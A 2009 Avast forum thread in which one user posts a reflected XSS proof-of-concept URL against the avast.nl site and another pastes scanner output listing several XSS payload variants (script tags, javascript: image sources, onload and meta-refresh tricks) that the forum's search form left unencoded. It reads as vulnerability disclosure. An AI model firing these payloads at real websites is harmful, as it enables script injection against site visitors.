Avast WEBforum
Other => General Topics => Topic started by: Methodman on May 31, 2009, 01:12:04 PM
-
POC
http://www.avast.nl/web/index.php?pageId=33&mode="><script>alert(String.fromCharCode(88,83,83))</script>
See some screenshots:
http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/20090531_Avast___XSS.html (http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/20090531_Avast___XSS.html)
-
Hi Methodman,
Thanks for reporting, but there is more here: unnamed form::search - found unencoded: ; \ / ' = Security Compass Logo
Test Results
XSS Heuristic Test Results
; \ / < > " ' =
Warnings:
Results:
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <SCRIPT <B>document.vulnerable=true;</SCRIPT>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC="  javascript:document.vulnerable=true;">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC="javascript:document.vulnerable=true;">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC="jav ascript:document.vulnerable=true;">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <SCRIPT>document.vulnerable=true;</SCRIPT>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
Results generated on May 31, 2009 for hxtp://forum.avast.com/index.php?action=p*
There is an awful lot penetration testing left to do online, that is why we have so many online threats going on,
polonus
P.S. If I use the script in a query, Firekeeper flag that in Firefox, glad to have Firekeeper for this....